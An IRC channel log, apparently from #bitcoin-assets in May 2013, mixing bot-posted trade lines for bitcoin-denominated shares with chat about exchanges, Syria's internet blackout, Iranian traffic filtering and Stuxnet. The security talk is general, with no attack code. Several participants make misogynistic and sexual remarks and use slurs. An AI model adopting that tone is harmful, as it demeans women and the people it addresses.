BTC [-] May 07 20:10:52 kako, what's this time? May 07 20:11:02 so May 07 20:11:05 they have an api May 07 20:11:07 but no api keys May 07 20:11:12 you need to use username and password May 07 20:11:15 each time May 07 20:11:23 OMG!? May 07 20:11:46 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] May 07 20:12:16 [BTCTC] [PAJKA.BOND] 8 @ 0.107999 = 0.864 BTC [+] May 07 20:15:48 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] May 07 20:19:43 oh, sweet innocence.... <<< it's a trap :D May 07 20:21:36 yeah reptilia could fall for it :D May 07 20:23:41 lulz just had the office bugging out cause i had a VPN setup on one of the main systems called "Romanian Wizards" May 07 20:27:43 lol May 07 20:29:01 [HAVELOCK] [SDICE] 5 @ 0.30999999 = 1.55 BTC [+] May 07 20:31:33 jurov who posted that about summit May 07 20:32:36 kakobrekla: https://bitcointalk.org/index.php?topic=192008.msg2061664#msg2061664 May 07 20:33:40 hm May 07 20:33:48 so if i take the virtual delegate ticket May 07 20:33:51 can i still go to sauna? May 07 20:34:35 you can propose to have webcams in sauna then May 07 20:34:54 for full coverage :DDDD May 07 20:35:10 yeah, that would be worth the whatever amout of dessertspoons of btc he is asking for it May 07 20:36:00 haha May 07 20:37:34 log.error("Matched trade date:%s earlier than order create date:%s", t['Date'], o.dateCreated) May 07 20:37:47 ^^me adding another mpex quirk to code May 07 20:39:29 dunno when that cesium clock goe through mpex clearance May 07 20:43:18 lalala May 07 20:43:53 kakobrekla too slovenly for sauna srry. May 07 20:44:08 aww cmon May 07 20:44:39 http://polimedia.us/dtng/c/res/6697.html May 07 20:44:42 there you go jurov May 07 20:45:38 http://polimedia.us/dtng/c/src/134660177871.jpg ic, very rigorous :) May 07 20:46:36 Currently at Rent-VPS.net we have 339 Mining Rigs (see below) May 07 20:46:36 We Accept Paypal - Easy , Fast and Secure May 07 20:46:40 they're email spamming nao. May 07 20:53:07 good for them, denominating in bitcoin May 07 20:56:44 pics or bullshit May 07 20:56:55 i want to see 339 colo's mining rigs May 07 20:59:18 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] May 07 21:05:20 [MPEX] [S.MPOE] 8960 @ 0.00073293 = 6.5671 BTC [-] May 07 21:06:36 [BTCTC] [BASIC-MINING] 7 @ 0.41 = 2.87 BTC [+] May 07 21:06:47 [BTCTC] [BASIC-MINING] 3 @ 0.4 = 1.2 BTC [-] May 07 21:09:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.012613 = 0.0378 BTC [+] May 07 21:11:22 lol srsly. May 07 21:23:00 [MPEX] [S.MPOE] 1000 @ 0.0007346 = 0.7346 BTC [+] May 07 21:23:04 [MPEX] [S.MPOE] 750 @ 0.0007358 = 0.5519 BTC [+] May 07 21:23:05 [MPEX] [S.MPOE] 1000 @ 0.00073406 = 0.7341 BTC [-] May 07 21:26:00 [MPEX] [S.MPOE] 1250 @ 0.00073406 = 0.9176 BTC [-] May 07 21:27:32 https://bitcointalk.org/index.php?topic=197842.msg2059570#msg2059570 May 07 21:27:37 lol, apparently that's a rented car. May 07 21:28:00 [MPEX] [S.MPOE] 5750 @ 0.0007358 = 4.2309 BTC [+] May 07 21:28:05 [MPEX] [S.MPOE] 2100 @ 0.00073581 = 1.5452 BTC [+] May 07 21:38:34 [BTCTC] [ASICMINER-PT] 1 @ 1.2495 BTC [-] May 07 21:38:46 [BTCTC] [ASICMINER-PT] 3 @ 1.2495 = 3.7485 BTC [-] May 07 21:38:57 [BTCTC] [ASICMINER-PT] 1 @ 1.2496 BTC [+] May 07 21:39:27 [BTCTC] [ASICMINER-PT] 2 @ 1.2496 = 2.4992 BTC [+] May 07 21:39:40 [BTCTC] [ASICMINER-PT] 1 @ 1.2497 BTC [+] May 07 21:39:51 [BTCTC] [ASICMINER-PT] 2 @ 1.2497 = 2.4994 BTC [+] May 07 21:40:02 [BTCTC] [ASICMINER-PT] 4 @ 1.25 = 5 BTC [+] May 07 21:40:07 [BTCTC] [ASICMINER-PT] 1 @ 1.255 BTC [+] May 07 21:40:13 [BTCTC] [ASICMINER-PT] 3 @ 1.255 = 3.765 BTC [+] May 07 21:40:17 [BTCTC] [ASICMINER-PT] 7 @ 1.255556 = 8.7889 BTC [+] May 07 21:48:55 [BTCTC] [ASICMINER-PT] 3 @ 1.255556 = 3.7667 BTC [+] May 07 21:59:32 ThickAsThieves: ping May 07 22:04:11 [MPEX] [S.MPOE] 8000 @ 0.00073406 = 5.8725 BTC [-] May 07 22:04:12 [MPEX] [S.MPOE] 422 @ 0.00073293 = 0.3093 BTC [-] May 07 22:04:28 [MPEX] [S.MPOE] 3320 @ 0.00073051 = 2.4253 BTC [-] May 07 22:17:54 [MPEX] [S.MPOE] 1673 @ 0.00073051 = 1.2221 BTC [-] May 07 22:19:33 [MPEX] [S.MPOE] 1500 @ 0.0007358 = 1.1037 BTC [+] May 07 22:19:34 [MPEX] [S.MPOE] 5688 @ 0.00073581 = 4.1853 BTC [+] May 07 22:19:50 [MPEX] [S.MPOE] 112 @ 0.00073671 = 0.0825 BTC [+] May 07 22:21:04 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19979 BTC [+] May 07 22:22:03 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1998 = 0.7992 BTC [+] May 07 22:22:58 hi all May 07 22:23:02 what's new May 07 22:25:13 [BTCTC] [BTC-GOLD] 1 @ 0.00642 BTC [+] May 07 22:27:02 hey MJR_, sounds like there was quite the turn out at the open-cry market yesterday May 07 22:35:56 working on one May 07 22:36:01 i was so exhausted yesterday May 07 22:36:05 i fell right into bed May 07 22:36:10 and back at work at 4am May 07 22:36:18 working on the web app now May 07 22:36:27 then i'll blog later tonight, after i have a few drinks in me May 07 22:36:44 heheh, werd May 07 22:37:45 [MPEX] [S.MPOE] 1200 @ 0.00073051 = 0.8766 BTC [-] May 07 22:48:51 kakobrekla or anyone: have you withdrawed from bitstamp recently? May 07 22:48:58 m_p!~AndChat13@adsl-068-209-251-085.sip.asm.bellsouth.net failed to login to mircea_popescu. May 07 22:49:01 define recently May 07 22:49:02 ok who's da smartass. May 07 22:49:11 since they changed account May 07 22:49:16 sepa seems to take longer than usual May 07 22:49:26 it went from 1 to 3 days apparently May 07 22:49:51 yes there seems to be more delays May 07 22:50:02 plus another 2-3 days to confirm the withrawal May 07 22:50:09 [BTCTC] [ASICMINER-PT] 1 @ 1.2578 BTC [+] May 07 22:50:31 [BTCTC] [ASICMINER-PT] 2 @ 1.2579 = 2.5158 BTC [+] May 07 22:50:36 [BTCTC] [ASICMINER-PT] 1 @ 1.25795 BTC [+] May 07 22:50:41 [BTCTC] [ASICMINER-PT] 1 @ 1.25795 BTC [+] May 07 22:50:49 seems i§ll move my ops to bitcoin.de (although that's different can of worms) May 07 22:51:19 ;;slap davout May 07 22:51:29 that's for b-c May 07 22:52:04 jurov they are retards May 07 22:52:06 but then again May 07 22:52:08 im a cunt. May 07 22:52:31 but you seem to use them anyway... May 07 22:52:53 via proxy May 07 22:52:54 http://shrani.si/f/18/vU/18LGkL4t/stamp.png May 07 22:53:57 [BTCTC] [BTC-GOLD] 9 @ 0.00642 = 0.0578 BTC [+] May 07 22:55:41 ah it came already..my scumbag bank added it sometime after 16:00, i need to pay sth quickly and tomorrow is holiday May 07 22:55:50 whatever May 07 23:02:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.012625 BTC [+] May 07 23:06:01 [MPEX] [S.MPOE] 157 @ 0.00073051 = 0.1147 BTC [-] May 07 23:06:03 [MPEX] [S.MPOE] 2600 @ 0.00072916 = 1.8958 BTC [-] May 07 23:13:29 [BTCTC] [ASICMINER-PT] 1 @ 1.22505 BTC [-] May 07 23:13:39 [BTCTC] [ASICMINER-PT] 2 @ 1.22504 = 2.4501 BTC [-] May 07 23:13:44 [BTCTC] [ASICMINER-PT] 1 @ 1.22502 BTC [-] May 07 23:13:48 [BTCTC] [ASICMINER-PT] 1 @ 1.225 BTC [-] May 07 23:13:58 [BTCTC] [ASICMINER-PT] 1 @ 1.22 BTC [-] May 07 23:19:26 [MPEX] [S.MPOE] 4321 @ 0.0007259 = 3.1366 BTC [-] May 07 23:19:28 [MPEX] [S.MPOE] 7407 @ 0.00072608 = 5.3781 BTC [+] May 07 23:20:35 MJR_ ping May 07 23:20:39 or are you drunk already May 07 23:22:42 [BTCTC] [BTC-BOND] 1 @ 0.01002 BTC [+] May 07 23:31:34 [MPEX] [S.MPOE] 36 @ 0.00072608 = 0.0261 BTC [+] May 07 23:31:36 [MPEX] [S.MPOE] 4321 @ 0.00073522 = 3.1769 BTC [+] May 07 23:31:38 [MPEX] [S.MPOE] 1000 @ 0.00073535 = 0.7354 BTC [+] May 07 23:31:39 [MPEX] [S.MPOE] 521 @ 0.00073536 = 0.3831 BTC [+] May 07 23:33:11 [BTCTC] [TAT.ASICMINER] 11 @ 0.012625 = 0.1389 BTC [+] May 07 23:33:27 [BTCTC] [TAT.ASICMINER] 9 @ 0.012625 = 0.1136 BTC [+] May 07 23:34:42 [MPEX] [S.MPOE] 4640 @ 0.00073536 = 3.4121 BTC [+] May 07 23:34:44 [MPEX] [S.MPOE] 2588 @ 0.00073671 = 1.9066 BTC [+] May 07 23:34:44 [MPEX] [S.MPOE] 1272 @ 0.00073729 = 0.9378 BTC [+] May 07 23:40:18 s.mpoe about to pop the lid? May 07 23:45:04 [BTCTC] [B.YABMC] 25 @ 0.0188 = 0.47 BTC [+] May 07 23:45:25 [BTCTC] [B.YABMC] 1 @ 0.0188 BTC [+] May 07 23:56:56 [BTCTC] [TAT.ASICMINER] 142 @ 0.012625 = 1.7928 BTC [+] May 07 23:57:14 [BTCTC] [PAJKA.BOND] 1 @ 0.107999 BTC [+] May 07 23:59:11 [BTCTC] [COGNITIVE] 1 @ 0.24999 BTC [+] May 07 23:59:21 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [+] May 07 23:59:40 https://bitcointalk.org/index.php?topic=5441.msg2060571#msg2060571 May 07 23:59:52 bitfloor #2 or smth May 08 00:00:29 after what maver did... May 08 00:00:39 im not sure why anyone is still doing any biz with him May 08 00:01:16 at least get a new nick or something. May 08 00:02:57 https://bitcointalk.org/index.php?topic=77469.msg2053249#msg2053249 < i presume that this has already been posted... but just in case http://video.cnbc.com/gallery/?play=1&video=3000166533 May 08 00:09:36 [MPEX] [S.MPOE] 1000 @ 0.00073725 = 0.7373 BTC [-] May 08 00:09:38 [MPEX] [S.MPOE] 7600 @ 0.00073729 = 5.6034 BTC [+] May 08 00:11:56 omg pgp May 08 00:12:00 [HAVELOCK] [SDICE] 10 @ 0.3001 = 3.001 BTC [-] May 08 00:12:02 [HAVELOCK] [SDICE] 10 @ 0.3 = 3 BTC [-] May 08 00:12:05 im at 3 min May 08 00:12:10 is this guy retarded May 08 00:12:53 good luck america May 08 00:12:55 haha May 08 00:13:30 [BTCTC] [COGNITIVE] 1 @ 0.246 BTC [-] May 08 00:16:20 [BTCTC] [ASICMINER-PT] 1 @ 1.25699 BTC [+] May 08 00:16:58 [BTCTC] [ASICMINER-PT] 1 @ 1.2575 BTC [+] May 08 00:17:33 [BTCTC] [B.YABMC] 25 @ 0.018 = 0.45 BTC [-] May 08 00:23:01 [HAVELOCK] [VTX] 1 @ 0.4645 BTC [+] May 08 00:24:08 http://www.psfk.com/2013/05/indictable-oxygen-breathing.html?goback=.gde_3863347_member_238547711 May 08 00:24:36 you think thats air you are breathing? May 08 00:24:50 hehe May 08 00:24:59 [BTCTC] [ASICMINER-PT] 1 @ 1.2579 BTC [+] May 08 00:26:01 [HAVELOCK] [VTX] 1 @ 0.4645 BTC [+] May 08 00:26:05 yeah - CTFC guy is kinda ridiculous - the whole discussion was ridiculous... May 08 00:26:57 preetymuch May 08 00:27:09 [MPEX] [S.MPOE] 2900 @ 0.00073725 = 2.138 BTC [-] May 08 00:28:00 [HAVELOCK] [VTX] 1 @ 0.4645 BTC [+] May 08 00:36:00 [HAVELOCK] [HIM] 1 @ 2 BTC [+] May 08 00:47:13 [MPEX] [S.MPOE] 1506 @ 0.00073725 = 1.1103 BTC [-] May 08 00:47:15 [MPEX] [S.MPOE] 1128 @ 0.00073729 = 0.8317 BTC [+] May 08 00:47:17 [MPEX] [S.MPOE] 7166 @ 0.0007373 = 5.2835 BTC [+] May 08 00:48:54 whats with the hair May 08 00:49:52 trying to win some of that assange groupie pussy? May 08 00:50:56 lol May 08 01:05:58 syria broke off of internet, more or less :( May 08 01:05:59 http://labs.umbrella.com/2013/05/07/breaking-news-traffic-from-syria-disappears-from-internet/ May 08 01:06:04 i sold some ripple, any interrest ? May 08 01:06:38 someone asked, what would happen to syrian-based bitcoin transactions that were to be made offline.. :/ May 08 01:07:13 hash by hand bro May 08 01:07:27 peer over tin cans and string May 08 01:08:41 hard to peer with their setup May 08 01:08:50 node and spoke works well when you don't want a kerjillion nodes May 08 01:09:03 when you want a kerjillion nodes, perhaps more sane architecture is nodes that can peer May 08 01:09:21 hub and spoke, excuse me May 08 01:15:13 truff1es i think that's more about encryption.. in the end, you need actual fibres, or whatever physical medium to carry the data over.. and that's what's at issue in syria May 08 01:17:16 bitcoiners could sponsor a web satellite for stuff like syria and egypt incidents May 08 01:17:27 or google or virgin May 08 01:18:38 would be nice heh, but would still need hardware on their side to do teh communications May 08 01:18:40 tough times May 08 01:18:56 iran's elections in a month, and they're experimenting with DPI filtering right now, etc etc May 08 01:19:18 *rambles about western companies selling off dpi equipment to authoritarian regimes* May 08 01:22:18 suprised DPI isnt everywhere by now May 08 01:22:37 the govt is 1 step ahead and the gov contractors are 5 steps ahead May 08 01:22:54 look at general dynamics and lockheed martin May 08 01:23:02 wish i knew what they do May 08 01:23:46 actually theres only one understanding of the osi model its how efficient you get at analyzing the layers and acting on the data..is where the trick is May 08 01:24:42 truff1es: that link is full of BS May 08 01:25:17 and DPI does jack shit on encrypted channels May 08 01:25:30 they _throttle_ encrypted channels May 08 01:25:35 apparently they have stateful dpi May 08 01:26:04 what do you mean by encrypted channel..a given TCP port with known encryption data? May 08 01:26:04 so it can (allegedly) create 'standard traffic profiles' May 08 01:26:13 well sure, you can throttle port 443 without any stateful inspection May 08 01:26:27 yeah if it's ssl, they can profile ssl.. if it's just bare tcp, sure it's more difficult true May 08 01:26:37 gotta figure, if its being throttled, it might be undergoing decryption May 08 01:26:39 [MPEX] [S.MPOE] 2000 @ 0.00073729 = 1.4746 BTC [-] May 08 01:26:44 [MPEX] [S.MPOE] 3434 @ 0.0007373 = 2.5319 BTC [+] May 08 01:26:45 [MPEX] [S.MPOE] 5000 @ 0.00073782 = 3.6891 BTC [+] May 08 01:26:53 but..all that can be stored for analyzation later..so why throttle anyway May 08 01:26:56 the idea/speculation is, they are experimenting with things (iran is) May 08 01:26:58 [MPEX] [S.MPOE] 2023 @ 0.00073783 = 1.4926 BTC [+] May 08 01:27:15 speculation again (tor-dev etc): they're trying to discourage off-country services May 08 01:27:16 so let them..they aint gonna find anything new May 08 01:27:29 get people to use youtube.ir, iran's version of gmail etc May 08 01:27:57 good grief May 08 01:28:05 this is prolly all about censorship May 08 01:28:13 KRS1: further analyzing will only work if they get their hands on the server's private key May 08 01:28:19 it's a more subtle social approach, i get it - why use the slow youtube when i can use iran's fast youtube which also has pirate filmzz May 08 01:28:22 actually wrong May 08 01:28:35 it will only work if they break the crypto May 08 01:28:36 you dont really *need* the key you have to figure it out May 08 01:28:41 right May 08 01:28:51 most standard web setups use ephemeral DH keys nowadays May 08 01:29:10 but i think they're actually being rather clever here. May 08 01:29:10 oh they're also doing intense dns poisoning May 08 01:29:12 etc May 08 01:29:25 so their censorship is more effective May 08 01:29:28 how many people check/bypass certificate errors May 08 01:30:12 also (at least in syria) chopping heads off people posting pro-uprising messages on fb - sure it's about censorship.. to the most intense/grotesque extent May 08 01:30:29 they don't need to break shit if they own teh CAs May 08 01:31:15 oh and its not iran necessarily to be grudged against..its Ahmadinejad..iranians are actually pretty cool folks May 08 01:31:26 well yeah, but as i understand it, browsers etc have lists of CA key fingerprints etc May 08 01:31:31 Ahmadinejad is an idiot maniac May 08 01:31:46 they should have split his wig when he was in NYC May 08 01:31:54 oh of course, by 'country X' i mean 'X state' - true May 08 01:32:03 chrome goes as far as pinned certificates for google services May 08 01:32:13 browsers have root CA certificates so the entire certificate chain is complete without browser errors May 08 01:32:20 tbh his speech (afaik) has been very much distorted when translated - by nobody's to argue here May 08 01:32:43 [BTCTC] [ASICMINER-PT] 1 @ 1.2579 BTC [+] May 08 01:33:02 anyone know their stance on BTC? May 08 01:33:25 Ahmadinejad was the more moderate of the two when he first won the election, his opponent was much worse than him May 08 01:33:39 i think its hilarious how Isreal keeps blowing up their key scientists and engineers May 08 01:33:46 that must frustrate the ever living hell out of him May 08 01:33:49 was this here May 08 01:33:50 http://blogs.wsj.com/venturecapital/2013/05/07/coinbase-nabs-5m-in-biggest-funding-for-bitcoin-startup/ May 08 01:34:05 wonder if he has a twitter feed May 08 01:34:43 funny little man..i could knock him out with one punch May 08 01:35:04 $5m to cover legal battle for $75m May 08 01:35:08 he must be 150 lbs soaking wet May 08 01:35:18 man i remember reading up on stuxnet.. that shit was fucking intense, targeting specific nuclear turbine models to make them malfunction and very slowly fail, etc May 08 01:35:40 [BTCTC] [ASICMINER-PT] 1 @ 1.25795 BTC [+] May 08 01:35:43 Framedragger: not turbines May 08 01:35:47 s/was/is, there's new shit in town of course May 08 01:35:50 yeh heh..that shit was involved at the concept and engineering level one...many say it was us or Isreael May 08 01:35:50 cetrifuges May 08 01:35:51 [BTCTC] [ASICMINER-PT] 2 @ 1.25795 = 2.5159 BTC [+] May 08 01:35:52 not sure of words sorry May 08 01:35:54 indeed May 08 01:35:54 centrifuges May 08 01:35:59 not a native speaker May 08 01:36:10 new shit? May 08 01:36:28 hrm don't have any links saved May 08 01:36:31 their uranium enrichment process is something like ours was back in the 60's and 70's May 08 01:36:46 it was pretty awesome though, just slow them down a little bit every now and again to cripple the enrichment May 08 01:36:48 well, new modular malware somethingsomething scaryscary May 08 01:36:49 but its a very simple process..just weeding out the heavier particles May 08 01:37:02 yeh i was like lol at that dub May 08 01:37:38 honestly i believe its a matter of time..humans are very crafty. May 08 01:37:44 nothing really stops us May 08 01:38:14 well, we will stop us, already have May 08 01:38:17 unless its that new mother of all bombs..supposed to drill 1600 feet or so through solid concrete before exploding May 08 01:38:23 like 38,000 lbs May 08 01:38:23 (re: new - http://www.wired.com/threatlevel/2012/05/flame/ , http://www.kaspersky.com/about/news/virus/2012/Resource_207_Kaspersky_Lab_Research_Proves_that_Stuxnet_and_Flame_Developers_are_Connected (i dislike the word 'proves' though heh)) May 08 01:38:32 good point truff1es May 08 01:38:53 anoyne know any good info on iran and BTC? May 08 01:39:29 i suppose the blockchain would tell us if theres any iranian btc..idk May 08 01:39:43 maybe im wrong i dont understand the blockchain fully May 08 01:40:07 no? May 08 01:40:22 would we just bend over and grab our ankles or something? May 08 01:40:54 i gotta make a few more trips to the strip club i suppose..the one place i can get away from everything and closer to little boobies May 08 01:41:08 wat May 08 01:41:28 a solid b-cup is nice May 08 01:42:03 except i got a dance today from a girl that was a-cup, b-cup at best and i was very happy. May 08 01:42:11 she stole my cigs and $60 bucks May 08 01:42:44 Had to follow after her after looking for her for 20 minutes to a real dark place full of gold teeth and I at least snatched my smokes from her before leaving. May 08 01:42:54 had a "hard" day May 08 01:43:44 she stole mine May 08 01:43:48 maybe i just need a gf May 08 01:44:11 except i like em all..not just one May 08 01:46:03 I dont have enough BTC yet for that Harem and island nation I've been thinking about May 08 01:48:42 rly? I can just dismiss them eh May 08 01:49:05 lol truff1es thats how i think too a lot of times "estrogen filled room/house/whatever" lol May 08 01:49:15 way too much bitchjuice up in here..im out May 08 01:50:53 [MPEX] [S.MPOE] 5850 @ 0.00073783 = 4.3163 BTC [+] May 08 01:52:34 [BTCTC] [ASICMINER-PT] 1 @ 1.2619 BTC [+] May 08 01:52:41 my vagina hurts May 08 01:52:47 [BTCTC] [ASICMINER-PT] 2 @ 1.265 = 2.53 BTC [+] May 08 01:53:04 give it a massage May 08 01:55:57 because it is awesome May 08 01:57:36 why are you linking spam in channel? May 08 01:58:04 just ognore whomever sent it May 08 01:58:06 i May 08 01:59:03 /mode +R May 08 01:59:19 that is supposed to block /query from non nickserv nicks May 08 02:00:05 you can leave a lot of them open and /close -m May 08 02:00:09 witha few clients May 08 02:00:15 to close all queries at once May 08 02:00:50 ijs if you ever find yourself in a situation where your client is flooded May 08 02:01:04 /close -m will clean it up May 08 02:01:55 [MPEX] [S.MPOE] 3077 @ 0.00073783 = 2.2703 BTC [+] May 08 02:02:00 [MPEX] [S.MPOE] 8636 @ 0.00073809 = 6.3741 BTC [+] May 08 02:02:03 [MPEX] [S.MPOE] 587 @ 0.00073864 = 0.4336 BTC [+] May 08 02:03:07 does that btc-alarm have a virus in it so it send all u wallet btc to some wallet in nigeria May 08 02:03:15 game over May 08 02:03:28 this is f'n amazing http://www.psfk.com/2013/05/indictable-oxygen-breathing.html?goback=.gde_3863347_member_238547711 May 08 02:07:34 is market price gonna take a small dip for now May 08 02:07:38 wait May 08 02:08:13 im seeing red May 08 02:08:21 ok sinbios May 08 02:08:27 i dont think itll dip much lower for a few days May 08 02:08:33 bah May 08 02:08:38 it's oscillating May 08 02:08:46 it'll coil for a day or two May 08 02:08:48 thats good enough for me May 08 02:09:00 then pop up or down probably May 08 02:09:14 loving this vol May 08 02:10:21 [BTCTC] [BTC-BOND] 400 @ 0.010019 = 4.0076 BTC [-] May 08 02:12:09 [BTCTC] [BTC-BOND] 99 @ 0.01002 = 0.992 BTC [+] May 08 02:12:19 ;;ticker May 08 02:12:20 BTCUSD ticker | Best bid: 110.90002, Best ask: 114.00000, Bid-ask spread: 3.09998, Last trade: 114.00000, 24 hour volume: 136322.49315219, 24 hour low: 97.52000, 24 hour high: 113.90000, 24 hour vwap: 106.58465 May 08 02:12:30 big ole market buy May 08 02:13:35 [BTCTC] [BTC-BOND] 100 @ 0.01003 = 1.003 BTC [+] May 08 02:16:02 [BTCTC] [BTC-BOND] 100 @ 0.01004 = 1.004 BTC [+] May 08 02:17:50 [BTCTC] [BTC-BOND] 1 @ 0.01005 BTC [+] May 08 02:18:46 [BTCTC] [BTC-BOND] 99 @ 0.01005 = 0.995 BTC [+] May 08 02:19:07 [BTCTC] [ESECURITYSABTC] 1 @ 0.35001 BTC [-] May 08 02:19:11 [BTCTC] [ESECURITYSABTC] 3 @ 0.35 = 1.05 BTC [-] May 08 02:21:01 [BTCTC] [BTC-BOND] 100 @ 0.01006 = 1.006 BTC [+] May 08 02:22:10 [BTCTC] [BTC-BOND] 99 @ 0.01007 = 0.9969 BTC [+] May 08 02:23:59 [BTCTC] [TAT.ASICMINER] 9 @ 0.012625 = 0.1136 BTC [+] May 08 02:28:04 ;;seen mircea_popescu May 08 02:28:05 mircea_popescu was last seen in #bitcoin-assets 3 hours, 39 minutes, and 2 seconds ago: ok who's da smartass. May 08 02:28:13 ;;seen smickles May 08 02:28:13 smickles was last seen in #bitcoin-assets 4 weeks, 5 days, 7 hours, 45 minutes, and 41 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm May 08 02:28:24 ;;seen mod6 May 08 02:28:24 mod6 was last seen in #bitcoin-assets 2 hours, 15 minutes, and 28 seconds ago: haha May 08 02:38:42 [MPEX] [S.MPOE] 3700 @ 0.00073399 = 2.7158 BTC [-] May 08 02:38:44 [MPEX] [S.MPOE] 4386 @ 0.00072885 = 3.1967 BTC [-] May 08 02:44:37 [MPEX] [S.MPOE] 2427 @ 0.00073864 = 1.7927 BTC [+] May 08 02:44:38 [MPEX] [S.MPOE] 673 @ 0.00073893 = 0.4973 BTC [+] May 08 02:46:34 [BTCTC] [ESECURITYSABTC] 3 @ 0.35 = 1.05 BTC [-] May 08 03:00:41 [BTCTC] [ASICMINER-PT] 1 @ 1.2687 BTC [+] May 08 03:01:18 [BTCTC] [ASICMINER-PT] 2 @ 1.269 = 2.538 BTC [+] May 08 03:13:32 thestringpuller: what up May 08 03:25:40 [BTCTC] [ASICMINER-PT] 3 @ 1.269 = 3.807 BTC [+] May 08 03:25:51 [BTCTC] [ASICMINER-PT] 1 @ 1.2728 BTC [+] May 08 03:25:56 [BTCTC] [ASICMINER-PT] 7 @ 1.2728 = 8.9096 BTC [+] May 08 03:26:01 [BTCTC] [ASICMINER-PT] 7 @ 1.2729 = 8.9103 BTC [+] May 08 03:26:09 [BTCTC] [ASICMINER-PT] 13 @ 1.27492 = 16.574 BTC [+] May 08 03:28:23 [BTCTC] [BITVPS] 1 @ 0.00128 BTC [-] May 08 03:28:28 [BTCTC] [BITVPS] 1 @ 0.00127 BTC [-] May 08 03:28:44 [BTCTC] [BITVPS] 1 @ 0.0012 BTC [-] May 08 03:28:47 [BTCTC] [BITVPS] 7 @ 0.001145 = 0.008 BTC [-] May 08 03:32:01 [HAVELOCK] [SDICE] 10 @ 0.3094 = 3.094 BTC [+] May 08 03:33:00 [HAVELOCK] [SDICE] 2 @ 0.3095 = 0.619 BTC [+] May 08 03:33:59 [HAVELOCK] [SDICE] 8 @ 0.31 = 2.48 BTC [+] May 08 03:53:57 [MPEX] [S.MPOE] 7327 @ 0.00073893 = 5.4141 BTC [+] May 08 03:53:59 [MPEX] [S.MPOE] 1300 @ 0.00075346 = 0.9795 BTC [+] May 08 04:28:51 [BTCTC] [ASICMINER-PT] 1 @ 1.274 BTC [-] May 08 04:32:25 [BTCTC] [ASICMINER-PT] 1 @ 1.26 BTC [-] May 08 04:32:36 [BTCTC] [ASICMINER-PT] 1 @ 1.240024 BTC [-] May 08 04:32:45 mod6: pm May 08 04:33:04 [BTCTC] [ASICMINER-PT] 1 @ 1.240021 BTC [-] May 08 04:33:08 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] May 08 04:33:11 nvm May 08 04:40:12 !ticker h HIM May 08 04:40:13 [HAVELOCK:HIM] 1D: 2.00000000 / 2 / 2.00000000 (7 shares, 14.00000000 BTC), 7D: 1.79000000 / 1.92910918 / 2.00000000 (120 shares, 231.49310198 BTC), 30D: 0.75000001 / 1.66707035 / 2.00000000 (757 shares, 1261.97225558 BTC) May 08 04:40:21 Oh damn May 08 04:40:23 HMMMMMMM May 08 04:40:26 Fucked that bet up May 08 04:40:43 http://www.economonitor.com/blog/2013/05/the-lessons-of-the-north-atlantic-crisis-for-economic-theory-and-policy/ May 08 04:41:02 tl;dr free markets don't exist May 08 04:51:01 [BTCTC] [TAT.ASICMINER] 30 @ 0.01265 = 0.3795 BTC [+] May 08 04:52:47 ;;tslb May 08 04:52:53 Time since last block: 1 hour, 52 minutes, and 49 seconds May 08 04:54:11 wow May 08 04:54:31 not bad May 08 04:54:50 asic preorders? ;) May 08 04:55:37 ;;tslb May 08 04:55:42 Time since last block: 1 hour, 55 minutes, and 38 seconds May 08 04:55:52 ;;nethash May 08 04:55:54 84184.323694 May 08 04:56:50 can't be bothered to look up a nethash-vs-time plot somewhere online, could be interesting May 08 04:57:48 Might be the entropy atm May 08 05:03:24 Framedragger: http://bitcoin.sipa.be/ May 08 05:04:20 and yes it is noisy as hell May 08 05:05:02 ;;bc,stats May 08 05:05:05 Current Blocks: 235055 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 816 blocks | Next Difficulty In About: 5 days, 1 hour, 38 minutes, and 23 seconds | Next Difficulty Estimate: 10758792.9993 | Estimated Percent Change: 6.77333 May 08 05:07:00 [BTCTC] [GSDPT] 7 @ 0.00315 = 0.0221 BTC [+] May 08 05:10:38 [BTCTC] [ASICMINER-PT] 1 @ 1.273942 BTC [+] May 08 05:10:49 [BTCTC] [ASICMINER-PT] 1 @ 1.273932 BTC [-] May 08 05:11:13 dub huh thanks, interesting (http://bitcoin.sipa.be/speed-lin-10k.png) - noisy indeed May 08 05:12:07 oh there are more interesting ones.. nice plots May 08 05:14:15 [BTCTC] [TAT.ASICMINER] 17 @ 0.01265 = 0.2151 BTC [+] May 08 05:17:58 ;;tslb May 08 05:18:04 Time since last block: 2 hours, 17 minutes, and 59 seconds May 08 05:19:19 lols May 08 05:21:26 [BTCTC] [ASICMINER-PT] 3 @ 1.273943 = 3.8218 BTC [+] May 08 05:25:12 [BTCTC] [TAT.ASICMINER] 20 @ 0.01265 = 0.253 BTC [+] May 08 05:27:41 [BTCTC] [ASICMINER-PT] 1 @ 1.273977 BTC [+] May 08 05:27:53 [BTCTC] [ASICMINER-PT] 4 @ 1.274 = 5.096 BTC [+] May 08 05:28:11 [BTCTC] [ASICMINER-PT] 1 @ 1.27479 BTC [+] May 08 05:29:12 [BTCTC] [ASICMINER-PT] 1 @ 1.2748 BTC [+] May 08 05:40:52 [BTCTC] [ASICMINER-PT] 7 @ 1.2748 = 8.9236 BTC [+] May 08 05:41:03 [BTCTC] [ASICMINER-PT] 6 @ 1.2748 = 7.6488 BTC [+] May 08 05:42:35 [BTCTC] [ASICMINER-PT] 12 @ 1.27492 = 15.299 BTC [+] May 08 05:42:46 [BTCTC] [ASICMINER-PT] 2 @ 1.27495 = 2.5499 BTC [+] May 08 05:50:54 [BTCTC] [ASICMINER-PT] 3 @ 1.27698 = 3.8309 BTC [+] May 08 05:55:02 [BTCTC] [ASICMINER-PT] 1 @ 1.27698 BTC [+] May 08 05:55:42 [BTCTC] [ASICMINER-PT] 1 @ 1.27698 BTC [+] May 08 05:55:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.01265 = 0.253 BTC [+] May 08 05:56:41 Geez, the AM are just flying today May 08 05:57:04 \o/ May 08 05:58:21 I can't complain :) May 08 05:58:40 it's div day tomorrow, i guess people are willing to pay a premium May 08 05:59:22 [BTCTC] 